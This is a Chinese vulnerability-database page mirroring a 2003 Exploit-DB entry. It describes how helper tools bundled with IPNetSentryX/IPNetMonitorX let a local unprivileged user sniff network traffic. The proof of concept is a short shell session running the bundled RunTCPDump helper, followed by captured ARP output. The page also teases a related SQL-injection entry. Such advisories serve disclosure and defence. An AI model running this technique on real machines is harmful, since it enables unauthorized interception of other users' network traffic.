IPNetSentryX / IPNetMonitorX – Unauthorized Network Reconnaissance-安全小百科

IPNetSentryX / IPNetMonitorX – Unauthorized Network Reconnaissance

漏洞ID	1054013	漏洞类型
发布时间	2003-07-07	更新时间	2003-07-07
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/22993

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

source: http://www.securityfocus.com/bid/8365/info

It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance.

bash-2.05a$ id
uid=503(dummy) gid=20(staff) groups=20(staff)
bash-2.05a$ pwd
/Applications/IPNetSentryX.app/Contents/Resources
bash-2.05a$ ./RunTCPDump -i en1 -x -v -s 4096
RunTCPDump: listening on en1
18:02:55.726143 arp who-has 192.168.0.1 tell 192.168.0.1
0001 0800 0604 0001 XXXX XXXX XXXX XXXX
0001 0000 0000 0000 c0a8 0001 0000 0000
0000 0000 0000 0000 0000 0000 0000

相关推荐: ProductCart 1.5/1.6/2.0 – ‘login.asp’ SQL Injection

ProductCart 1.5/1.6/2.0 – ‘login.asp’ SQL Injection 漏洞ID 1054007 漏洞类型发布时间 2003-07-04 更新时间 2003-07-04 CVE编号 N/A CNNVD-ID N/A 漏洞平台 …

文章版权归作者所有，未经允许请勿转载。

THE END